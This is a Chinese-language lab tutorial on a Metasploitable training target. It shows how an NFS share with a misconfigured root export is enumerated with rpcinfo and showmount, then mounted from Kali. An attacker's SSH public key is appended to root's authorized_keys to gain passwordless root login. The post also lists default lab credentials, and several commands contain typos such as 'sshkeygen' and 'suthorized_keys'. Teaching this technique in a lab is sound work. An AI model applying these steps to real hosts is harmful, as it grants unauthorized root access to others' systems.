• Msftables之Linux NFS共享目录配置漏洞


    实验目的

    1、了解Metasploitables靶机系统漏洞;

    2、学习使用Metasploit。

    实验原理

    msftables之利用Linux NFS共享目录配置漏洞渗透。

    实验内容

    msftables之利用Linux NFS共享目录配置漏洞渗透。

    实验环境描述

    1、学生机与实验室网络直连;

    2、VPC1、VPC2与实验室网络直连。

    实验步骤

    1、打开靶机(登陆用户名:msfadmin 密码:msfadmin),查看靶机的IP地址。

    命令:ifconfig

    图片描述

    2、打开渗透机(登陆用户名:root 密码:toor)并查看其IP地址。

    命令:ifconfig

    图片描述

    3、在渗透机kali上查看靶机上的nfs服务是否开启

    命令:rpcinfo –p 192.168.10.100

    图片描述

    4、在渗透机kali上查看靶机上设置的远程共享目录列表

    命令:showmount –e 192.168.10.100

    图片描述

    5、生成rsa公钥

    命令:sshkeygen

    图片描述

    6、在渗透机 /tmp目录下新建文件夹msftables,以备后续挂载需求

    命令:mkdir /tmp/msftables

    图片描述

    7、把靶机192.168.10.100的根目录挂载到渗透机上新建的/tmp/mstables/目录下;

    命令:mount –o nolock –t nfs 192.168.10.100:/ /tmp/msftables/

    图片描述

    8、把渗透机上生成的公钥追加到靶机的authorized_keys下

    命令:cat /root/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/suthorized_keys

    图片描述

    9、实现无密码ssh登录

    命令:ssh root@192.168.10.100

    图片描述

    10、 查看ip地址检测是否已登录到靶机

    命令:ifconfig

    图片描述

  • 相关阅读:
    GB2312 字符集
    Excel导入
    Excel导出
    解决文件下载在火狐浏览器出现中文文件名乱码的方法
    Struts2将图片输出到页面
    jsp页面中日期的格式化
    java正则表达式笔记
    利用git将项目上传到github
    Java中枚举的写法和用法
    自定义JQuery插件
  • 原文地址:https://www.cnblogs.com/lzkalislw/p/13625552.html
Copyright © 2020-2023  润新知